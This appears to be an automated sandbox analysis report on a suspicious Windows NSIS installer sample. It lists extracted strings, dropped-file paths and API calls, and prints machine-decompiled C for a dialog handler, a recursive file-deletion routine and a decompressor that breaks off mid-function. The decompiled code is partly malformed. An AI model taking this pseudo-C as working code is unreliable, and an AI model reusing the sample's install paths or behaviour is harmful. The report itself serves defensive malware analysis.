C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
1033, xrefs: 00403834
Error launching installer, xrefs: 004038C9
~nsu, xrefs: 00403918
TEMP, xrefs: 00403818
SeShutdownPrivilege, xrefs: 00403A6B
\Temp, xrefs: 004037EA
C:\Users\user\Desktop\xKBLVUHoY6.exe, xrefs: 004039D3
C:\Users\user\Desktop, xrefs: 0040393F, 00403944, 00403977
Low, xrefs: 00403806
NSIS Error, xrefs: 00403658
TMP, xrefs: 00403820
"C:\Users\user\Desktop\xKBLVUHoY6.exe" , xrefs: 0040366D, 00403673, 00403688, 0040385F, 0040386B, 004038B9, 004038C3
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
.tmp, xrefs: 00403934
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 004038F2

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\xKBLVUHoY6.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless$C:\Users\user\Desktop$C:\Users\user\Desktop\xKBLVUHoY6.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-3577722414
Opcode ID: 19eda2f042309b10385eac17fda2952eb921897bdf3b203613f4dc307425cfa4
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: 19eda2f042309b10385eac17fda2952eb921897bdf3b203613f4dc307425cfa4
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8); // executed
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226e0; // 0x56b904
								E00405569( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056b0
0x004056b6
0x004056c0
0x004056c3
0x00405859
0x00405876
0x0040587d
0x0040587d
0x00405890
0x004058ae
0x004058b0
0x004058b8
0x0040590e
0x00405912
0x00000000
0x00000000
0x00405914
0x0040591a
0x00000000
0x00000000
0x00405924
0x0040592c
0x0040592f
0x00405a31
0x00000000
0x00405a31
0x0040593e
0x00405949
0x00405952
0x0040595d
0x00405960
0x00405969
0x0040596f
0x00405972
0x00405972
0x0040598a
0x00405993
0x00405996
0x0040599d
0x004059a4
0x004059ac
0x004059ac
0x004059c3
0x004059c3
0x004059ca
0x004059d0
0x004059dc
0x004059e3
0x004059ec
0x004059ee
0x004059f1
0x00405a00
0x00405a03
0x00405a09
0x00405a0a
0x00405a10
0x00405a11
0x00405a12
0x00405a1a
0x00405a25
0x00405a2b
0x00405a2b
0x00000000
0x0040598a
0x004058c0
0x004058f0
0x004058f8
0x004058fa
0x00405903
0x00405903
0x00405909
0x00000000
0x00405909
0x004058c4
0x004058ce
0x00000000
0x00405892
0x00405898
0x004058d3
0x00000000
0x004058dc
0x004058a1
0x004058a6
0x004058a9
0x00000000
0x004058a9
0x00405890
0x004056c9
0x004056cd
0x004056d5
0x004056d9
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e6
0x004056e7
0x00405700
0x00405703
0x0040570d
0x0040571c
0x00405724
0x0040572c
0x00405731
0x00405734
0x00405740
0x00405749
0x00405752
0x00405774
0x0040577a
0x0040578b
0x00405790
0x0040579e
0x004057ac
0x004057ac
0x004057b1
0x004057bf
0x004057bf
0x004057c4
0x004057c7
0x004057cc
0x004057d8
0x004057e1
0x004057ee
0x004057fd
0x004057f0
0x004057f5
0x004057f5
0x00405809
0x00405809
0x0040581d
0x00405826
0x0040582f
0x0040583f
0x0040584b
0x0040584b
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405706
GetDlgItem.USER32(?,000003EE), ref: 00405715
GetClientRect.USER32(?,?), ref: 00405752
GetSystemMetrics.USER32(00000002), ref: 00405759
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
ShowWindow.USER32(?,00000008), ref: 004057F5
GetDlgItem.USER32(?,000003EC), ref: 00405816
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
GetDlgItem.USER32(?,000003F8), ref: 00405724

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

GetDlgItem.USER32(?,000003EC), ref: 00405868
CreateThread.KERNEL32(00000000,00000000,Function_0000563C,00000000), ref: 00405876
CloseHandle.KERNELBASE(00000000), ref: 0040587D
ShowWindow.USER32(00000000), ref: 004058A1
ShowWindow.USER32(?,00000008), ref: 004058A6
ShowWindow.USER32(00000008), ref: 004058F0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
CreatePopupMenu.USER32 ref: 00405935
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
GetWindowRect.USER32(?,?), ref: 00405969
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
OpenClipboard.USER32(00000000), ref: 004059CA
EmptyClipboard.USER32 ref: 004059D0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
GlobalLock.KERNEL32(00000000), ref: 004059E6
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
CloseClipboard.USER32 ref: 00405A2B

Strings

{, xrefs: 0040590E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 032864259362101ae99535f7cbe98c4ea316b66d58bd4d2ac02e905e66ea94f0
Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
Opcode Fuzzy Hash: 032864259362101ae99535f7cbe98c4ea316b66d58bd4d2ac02e905e66ea94f0
Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c1d
0x00405c22
0x00405c2b
0x00405c2e
0x00405c36
0x00405c39
0x00405c3c
0x00405c44
0x00405c46
0x00405c47
0x00000000
0x00405c47
0x00405c52
0x00405c55
0x00405c55
0x00405c55
0x00405c59
0x00405c6c
0x00405c73
0x00405c78
0x00405c7c
0x00405c8c
0x00405c7e
0x00405c84
0x00405c84
0x00405c91
0x00405c95
0x00405ca1
0x00405ca7
0x00405cac
0x00405cb2
0x00405cbd
0x00405cc3
0x00405cc5
0x00405cc8
0x00405d72
0x00405d72
0x00405d76
0x00405d78
0x00405d78
0x00405d78
0x00405d78
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cce
0x00405cce
0x00405cce
0x00405cd6
0x00405cf6
0x00405cfe
0x00405d03
0x00405d0a
0x00405d25
0x00405d2a
0x00405d2c
0x00405d50
0x00405d2e
0x00405d2e
0x00405d31
0x00405d45
0x00405d33
0x00405d36
0x00405d3e
0x00405d3e
0x00405d31
0x00405d0c
0x00405d12
0x00405d14
0x00405d1a
0x00405d1a
0x00405d14
0x00000000
0x00405d0a
0x00405cd8
0x00405ce0
0x00000000
0x00000000
0x00405ce2
0x00405cea
0x00000000
0x00000000
0x00405cec
0x00405cf4
0x00000000
0x00000000
0x00000000
0x00405d55
0x00405d5d
0x00405d63
0x00405d63
0x00405d6c
0x00000000
0x00405d6c
0x00405c97
0x00405c9f
0x00000000
0x00000000
0x00000000
0x00405c5b
0x00405c5b
0x00405c5d
0x00405d7d
0x00405d7f
0x00405d82
0x00405dd3
0x00405dd3
0x00405dd3
0x00405d84
0x00405d87
0x00405d92
0x00405d97
0x00405d99
0x00000000
0x00000000
0x00405d9c
0x00405da8
0x00405dad
0x00405daf
0x00000000
0x00405dca
0x00405db1
0x00405db4
0x00000000
0x00000000
0x00405db9
0x00000000
0x00405dc0
0x00405d89
0x00405d89
0x00000000
0x00405d89
0x00405c63
0x00405c66
0x00000000
0x00000000
0x00000000
0x00405c66

APIs

DeleteFileW.KERNELBASE(?,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(Undervisningssektionernes\Zoophorous.Atl,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,Undervisningssektionernes\Zoophorous.Atl,?,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNELBASE(Undervisningssektionernes\Zoophorous.Atl,?,?,?,0040A014,?,Undervisningssektionernes\Zoophorous.Atl,?,?,770F3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNEL32(00000000), ref: 00405D6C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20
., xrefs: 00405CE2
Undervisningssektionernes\Zoophorous.Atl, xrefs: 00405C6C, 00405C72, 00405C83, 00405CBC
., xrefs: 00405CCE
\*.*, xrefs: 00405C7E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$Undervisningssektionernes\Zoophorous.Atl$\*.*
API String ID: 2035342205-1285553889
Opcode ID: 62f7cfa9fff3930ae21cb656bb45e977fea218a9361954a66eba92a673b55763
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: 62f7cfa9fff3930ae21cb656bb45e977fea218a9361954a66eba92a673b55763
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
